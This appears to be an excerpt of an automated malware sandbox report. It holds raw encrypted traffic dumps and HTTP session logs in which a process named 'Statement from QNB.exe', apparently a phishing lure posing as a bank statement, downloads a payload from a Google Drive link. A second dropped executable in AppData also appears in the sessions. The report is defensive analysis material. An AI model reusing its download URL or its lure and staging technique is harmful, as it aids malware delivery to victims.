fa 0d a4 4e a3 37 e1 5b ee 49 02 31 f4 48 c5 95 2e c2 94 10 a6 26 7f 62 e5 6b 95 e7 d9 f9 27 08 85 9e 0e bf c1 5f 65 81 fb f8 94 96 b3 71 52 81 58 d2 41 20 15 ab 24 97 a4 03 c2 00 77 fe e4 b5 08 c8 f8 4c 72 99 cb 4c 0f
                                                                                                  Data Ascii: 4`0XVT*+Z[,Oa"aSE6aO)4`YMwywZv/?aA+OT3e$(&+i3qEYkb>i,2?LHW[N*m!b)V5PaN7[I1H.&bk'_eqRXA $wLrL
                                                                                                  2021-11-24 13:16:13 UTC170INData Raw: 91 dd 68 08 3d 69 da 94 97 96 9b 6f 52 5a 0e bd d6 b1 dc 64 9f aa 46 a8 fa d6 15 e0 ad c4 1d ae d3 90 75 31 52 72 44 22 3b df 41 f7 15 d2 4f 0f 66 35 4a 08 0a 6e a2 28 5a 36 ca 52 8f a9 47 d1 bb 9c 12 af c3 75 14 7f d0 c3 79 43 64 d7 33 6b 7f 37 71 25 08 94 9a ab 56 ae 4e 8c fc 57 b4 a2 52 01 e6 fb ff 90 21 88 32 ee a6 9d 99 16 a2 fb a6 0d fd f5 e8 32 43 67 b1 3e 0e d8 3a 84 c4 fb f4 84 b6 53 6b ec 8c ac d3 78 98 c0 51 c2 c0 8c 4f 9b 87 bb 8e 78 6f db 1e 48 38 83 92 e2 f9 68 83 13 5d c3 ed 58 01 76 33 8b 34 5d 80 20 6c 20 e3 ed 04 00 a0 6d 23 7b 8e 7e 0a 63 91 03 12 e9 e5 a5 28 aa 66 e8 b6 b8 79 eb 06 15 95 89 e8 ce 20 59 69 39 e0 ff 8a df d2 13 d4 2e ae c9 26 d3 8c 1e b2 34 9f ca 69 0a 46 92 57 a9 e3 f8 1f f9 93 3e 85 9a 46 32 15 aa 44 e4 5d e6 bc 03 8d
                                                                                                  Data Ascii: h=ioRZdFu1RrD";AOf5Jn(Z6RGuyCd3k7q%VNWR!22Cg>:SkxQOxoH8h]Xv34] l m#{~c(fy Yi9.&4iFW>F2D]
                                                                                                  2021-11-24 13:16:13 UTC171INData Raw: 01 95 86 48 39 3c a4 9a 4e 11 54 d7 8b 7b 9e f6 c1 e4 7a 33 9c 5e a8 6c da 5f 29 38 a5 06 d8 cb 51 8a 39 0f 68 4e 3e 5d 94 63 82 27 c1 ef bf da ab 8f 61 e4 32 ed bb 6f 9a c5 f9 d9 8c ce 26 7b 2c a8 e4 7e 48 93 92 d2 46 d4 39 c0 d6 11 23 19 18 7f ac 60 fe 6e 33 4a 20 d2 3d 65 c9 22 6d 0c 4e 86 75 77 b9 ba 9c 1c e6 59 5a 93 70 eb 69 96 b1 ff 9f 93 1d 87 ca d4 52 ed 7c cc 4e 92 88 e7 b1 d8 70 3d 17 3e 3b 45 43 44 dd 9f 04 e2 2d dd a3 81 21 63 f7 50 e2 98 6d eb e7 54 52 6a 6c 7b 09 57 4a 97 34 8b f1 cf a9 55 36 0f 26 d7 99 5f 53 f8 93 cb c7 cb 23 6d fb bc 30 3a 3d 5f eb df b1 42 04 f3 a7 e0 9b 3c fb cf 6a eb 2e 73 55 32 f9 5c cb 9b ff b1 fa 75 5b f6 c9 9e 15 50 f3 ea a7 26 a3 0f 36 ac 5a b8 7e 5a a0 f2 67 d4 51 76 6d 19 f0 15 c9 5f ec f9 d4 49 19 dd 65 f7 c0
                                                                                                  Data Ascii: H9<NT{z3^l_)8Q9hN>]c'a2o&{,~HF9#`n3J =e"mNuwYZpiR|Np=>;ECD-!cPmTRjl{WJ4U6&_S#m0:=_B<j.sU2\u[P&6Z~ZgQvm_Ie
                                                                                                  2021-11-24 13:16:13 UTC172INData Raw: fb d1 c9 84 86 0d cb 64 d0 e4 1c 76 ed a7 63 c6 2a 97 39 cd 3f 08 1a 59 41 3d b4 db 82 5e f2 a7 af d6 fe f6 72 31 ca 44 43 a1 26 08 e1 a8 eb 35 b4 ab 8e f6 a1 07 bd 59 05 6e 8e b3 93 81 5e 93 39 c2 e2 8d 6f 68 a2 79 1e 72 b4 db 22 d1 4e f6 c1 45 14 b0 1c 54 52 95 23 9b 2e e6 fd 1e 26 bc d0 2b 6a a4 1c c1 82 04 e3 1b 03 e9 67 66 f3 7d b0 44 be 95 37 f1 ad 84 3d ea 78 7c b1 fb af 6f 35 3a 2b b2 57 4e 38 4c cb 1f b5 fd 5c 33 68 10 20 ec ae 03 29 39 e9 ac f7 76 e5 94 86 05 20 d6 5a bd 4c bd 0b 6c ca 09 88 3c c0 37 1c 31 cd a4 c2 3e ea b4 b4 30 04 ca 3f 3a e5 a6 1f 62 6a 85 9d 7a a7 a0 e5 db 93 6a 00 c7 65 1c f0 49 5a ab 03 f6 13 27 9e 3b 19 25 b9 71 35 23 e5 61 40 c9 42 95 3f 74 5a 87 69 81 2d 40 44 75 49 57 91 b2 f4 fc 9c 5f 0c 00 3c 67 0a c5 f2 85 56 9d 32
                                                                                                  Data Ascii: dvc*9?YA=^r1DC&5Yn^9ohyr"NETR#.&+jgf}D7=x|o5:+WN8L\3h )9v ZLl<71>0?:bjzjeIZ';%q5#a@B?tZi-@DuIW_<gV2
                                                                                                  2021-11-24 13:16:13 UTC173INData Raw: e8 4a 6b b7 0a 6f e2 6c fa 93 ea fc 94 b7 ee c6 6c 57 98 0e a3 e7 4d 4a 71 0e d6 29 67 94 a7 ff fc c1 44 f1 20 ca 0f 58 45 5e 16 9b ea 58 ff d2 62 dc 06 e5 22 36 54 74 82 73 af 04 69 3a 52 92 ec f5 bf fd 67 5b a8 22 b4 49 f6 3a d4 03 e1 26 06 b6 28 35 b0 32 ab 0c b4 13 4e 9d 18 df c4 c6 6c 70 94 8e 39 9b df de d6 18 33 6a 3c 14 d6 ec 60 bc a1 c7 ad 88 3c fe 86 a8 5e 6d cb 87 e2 e0 7e 5d a5 22 ac 52 fe 34 43 a2 71 c8 56 57 fd 83 13 83 18 c0 18 8b 9b f5 21 07 03 08 95 d7 56 65 2b 04 1a 85 87 17 15 a6 c2 63 23 89 01 d6 8a e0 92 cd 72 46 47 03 54 9f 52 0c 9e 32 df 60 b5 5f 9b be 4f 2a e7 96 45 a6 e5 1c 6e 15 04 06 91 9f 00 83 57 2f ae 69 6e 25 14 a1 59 55 48 83 17 60 a6 38 d8 29 1e cd 20 a0 84 27 f8 19 10 b2 7e 1b 91 7a 16 60 87 ad a1 76 b6 17 b5 7a 57 de 86
                                                                                                  Data Ascii: JkollWMJq)gD XE^Xb"6Ttsi:Rg["I:&(52Nlp93j<`<^m~]"R4CqVW!Ve+c#rFGTR2`_O*EnW/in%YUH`8) '~z`vzW
                                                                                                  2021-11-24 13:16:13 UTC175INData Raw: 73 7e f1 2c b2 a3 48 e5 51 c4 ab 0e 4e be 63 9d 01 a4 a0 0d 8d 58 93 42 cf 5d 43 fa d4 e5 2f 1e 56 1a 81 09 76 35 36 87 34 b5 ce 6a 70 d6 61 55 bf 84 5f 5c 16 98 bc 93 4d fd ed 93 70 37 db ef d7 10 9b 49 52 98 71 c6 0f 8c 09 57 10 8d b4 db 2a a0 87 ae 79 18 93 28 43 83 b6 65 66 09 8d b0 7f b4 cc 84 ec f2 79 68 e6 05 09 fa 59 3e bd 6e 9c d2 56 d2 29 75 59 bc 08 06 3f ca 6a 29 dd 3d f7 27 ab 25 af 6e 92 42 69 22 12 28 fa 06 c3 fa 0c 8a 6b 68 17 34 49 69 cb 00 f4 7b fa 23 e8 86 67 d6 93 24 5c 4e 14 d1 03 40 a2 f4 33 21 5a 30 49 f2 67 fa 51 88 b4 9f c3 8f de 06 0e af 45 5c 44 46 84 d7 1f 9d 1d a9 28 f1 4c fc 52 9f d7 5a 4d f3 e0 23 4b 4a ea 76 39 fa b7 7c 60 52 e9 82 d6 42 b8 31 46 89 aa 26 38 cf 77 49 b2 38 b8 9d 6b e0 88 f3 2e 63 3a 6f 3c c2 f5 c8 78 65 8d
                                                                                                  Data Ascii: s~,HQNcXB]C/Vv564jpaU_\Mp7IRqW*y(CefyhY>nV)uY?j)='%nBi"(kh4Ii{#g$\N@3!Z0IgQE\DF(LRZM#KJv9|`RB1F&8wI8k.c:o<xe
                                                                                                  2021-11-24 13:16:13 UTC176INData Raw: 1a ef ac 52 f7 3d c4 ab 6d 69 28 34 58 42 f4 2f d4 ee f3 d4 e0 0f d8 b9 b4 d0 ea d9 e7 9f 95 3e b7 5d 50 c4 53 c3 74 30 c1 12 9e f3 36 b8 91 6a e3 75 cd 25 fa 80 cf 31 00 b3 ca 95 ce 50 ec 24 64 cf f6 89 59 11 b9 8b 71 21 9a 58 d1 93 e7 ed 89 7a 60 d8 a2 33 e2 e2 6d 9a 6a d2 20 b5 11 99 0e 07 58 26 e2 19 85 f8 01 07 45 36 76 5e b4 4d a1 97 15 eb bf 4d 53 d2 ed 15 58 93 c4 6f 9e af 27 d3 5c 19 41 33 d0 da 56 46 02 20 c8 1b 57 9f 7c b4 1e 82 be d1 ca ee 22 a2 3e 5d ae 12 d0 6a c1 15 ff 6f 25 60 32 79 65 88 e4 64 96 47 27 56 98 93 a3 4a 26 17 c0 38 fa f9 e7 e2 5a 37 53 cc e1 b2 c7 49 18 8b 9d 0d cc a2 81 ee d1 ff 6c c2 e9 41 e8 ba 7f 3c b3 cc 32 44 ba c7 48 2c 24 0e 8c b0 a5 5a 91 a2 ab 28 f3 d8 c8 67 a7 c8 24 81 d3 e7 61 06 ba 2a 1a 7a eb 58 4a 3f 3c 6f 23
                                                                                                  Data Ascii: R=mi(4XB/>]PSt06ju%1P$dYq!Xz`3mj X&E6v^MMSXo'\A3VF W|">]jo%`2yedG'VJ&8Z7SIlA<2DH,$Z(g$a*zXJ?<o#
                                                                                                  2021-11-24 13:16:13 UTC177INData Raw: bc dd 81 ec ff 7e 61 f1 14 0c fa 54 39 b4 71 9c da 47 d7 29 78 5e b5 1f 17 3a ca 67 2e d4 22 f7 2f ba 20 af 63 95 4b 7e 33 17 28 f7 01 ca e5 0c 82 7a 6d 17 39 4e 60 dc 11 f1 7b f7 24 e1 99 67 de 82 21 5c 43 13 d8 14 51 a7 f4 3e 26 53 2f 49 fa 76 ff 51 85 b3 96 d4 9e db 06 03 a8 4c 43 44 4e 95 d2 1f 90 1a a0 3f e0 49 fc 5f 98 de 45 4d fb f1 26 4b 47 ed 7f 2e eb b2 7c 6d 55 e0 9d d6 4a a9 34 46 84 ad 2f 2f de 72 49 bf 3f b1 82 6b e8 99 f6 2e 6e 3d 66 2b d3 f0 c8 75 62 84 61 ae ca 79 0b 91 9b 70 40 4d 87 e3 6e b5 30 e5 cb 6c 51 fa 08 38 73 45 4c 9f 2e 57 2b 9e f1 0a 02 8f bb 8c 0f dc 1a 2f 26 b0 c7 23 48 25 50 74 34 5f 52 ea 1c 7f 05 30 39 17 a2 ba 85 ab 82 d7 34 db 52 09 94 d7 38 d8 27 0b 16 46 76 48 a8 b0 d7 16 17 33 a7 58 a5 e3 18 e1 70 b2 34 ee de 67 37
                                                                                                  Data Ascii: ~aT9qG)x^:g."/ cK~3(zm9N`{$g!\CQ>&S/IvQLCDN?I_EM&KG.|mUJ4F//rI?k.n=f+ubayp@Mn0lQ8sEL.W+/&#H%Pt4_R094R8'FvH3Xp4g7


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.11.2049827142.250.185.78443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:05 UTC178OUTGET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                                                                                                  2021-11-24 13:17:05 UTC178INHTTP/1.1 302 Moved Temporarily
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 24 Nov 2021 13:17:05 GMT
                                                                                                  Location: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download
                                                                                                  Content-Security-Policy: script-src 'nonce-GzAxQVggdXZtkhaD16NcwQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Server: GSE
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  2021-11-24 13:17:05 UTC179INData Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e
                                                                                                  Data Ascii: 198<HTML><HEAD><TITLE>
                                                                                                  2021-11-24 13:17:05 UTC179INData Raw: 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 34 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 33 35 73 75 6d 76 6a 30 76 75 65 32 72 69 32 75 76 32 65 63 61 73 64 64 67 32 38 6d 63 64 6b 6a 2f 61 64 36 67 6c 72 38 6c 30 68 39 39 68 71 70 6e 67 74 66 6e 69 36 61 38 69 32 32 6e 76 36
                                                                                                  Data Ascii: Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv6
                                                                                                  2021-11-24 13:17:05 UTC180INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.11.2049828142.250.186.97443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:05 UTC180OUTGET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: doc-0k-48-docs.googleusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2021-11-24 13:17:05 UTC180INHTTP/1.1 302 Found
                                                                                                  X-GUploader-UploadID: ADPycdvyzG6nh0khhIaD_CSb1SCCzAvMugXg8yAsU43qkUjpk8JcUq7GKeFQSz7HDwIGEnnldS-goz8negBt2vxj7S7TrrKmaA
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                  P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info."
                                                                                                  Location: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu
                                                                                                  Date: Wed, 24 Nov 2021 13:17:05 GMT
                                                                                                  Expires: Wed, 24 Nov 2021 13:17:05 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  Content-Length: 0
                                                                                                  Server: UploadServer
                                                                                                  Set-Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm; Domain=doc-0k-48-docs.googleusercontent.com; Expires=Wed, 24-Nov-2021 13:27:05 GMT; Path=/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj; Secure; SameSite=none; HttpOnly
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.11.2049829172.217.168.14443C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:05 UTC184OUTGET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Host: docs.google.com
                                                                                                  Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                                                                                                  2021-11-24 13:17:06 UTC185INHTTP/1.1 302 Found
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 24 Nov 2021 13:17:06 GMT
                                                                                                  Location: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                  Report-To: {"group":"DriveUntrustedContentSignerHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external"}]}
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentSignerHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'nonce-GX2Wk6I72fDmKMfOQ/zL8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentSignerHttp/cspreport;worker-src 'self'
                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentSignerHttp"
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.11.2049830142.250.186.97443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:06 UTC186OUTGET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Host: doc-0k-48-docs.googleusercontent.com
                                                                                                  Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm
                                                                                                  2021-11-24 13:17:06 UTC187INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: ADPycdsi9LkYyPCYsFJN6bLV1_MQjn8u7gis9V02JUG_wORDpPlwFexYCyf3wTUIgAxl8zUO3nabu8wY4r3-HdUphAcHxB8Dgg
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
